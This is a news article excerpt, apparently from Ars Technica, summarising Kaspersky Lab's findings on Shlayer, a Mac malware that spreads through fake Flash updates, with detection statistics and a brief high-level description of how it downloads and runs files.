Mac users are getting bombarded by laughably unsophisticated malware

Mac users are getting bombarded by laughably unsophisticated malware

Enlarge (credit: Kaspersky Lab)

Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it’s the number one threat encountered by users of Kaspersky Labs’ antivirus programs for macOS.

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by the Kaspersky Lab’s Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Read 7 remaining paragraphs | Comments

https://arstechnica.com/?p=1648279

Source: Ars Technica

By:

Amazon Care to provide delivery and pick-up of at-home COVID-19 test sample kits in Seattle trial
Amazon Care to provide delivery and pick-up of at- ...
Stripe goes Fast for $20M, D2C tips and tricks and what’s happening to tech internships?
Stripe goes Fast for $20M, D2C tips and tricks and ...
Apple opens access to mobility data, offering insight into how COVID-19 is changing cities
Apple opens access to mobility data, offering insi ...
Fintech’s next decade will look radically different
Fintechs next decade will look radically differ ...
O2 5G is now available in 20 UK cities
O2 5G is now available in 20 UK cities ...
For alternative meat manufacturer Beyond Meat, fast food chains giveth and taketh away
For alternative meat manufacturer Beyond Meat, fas ...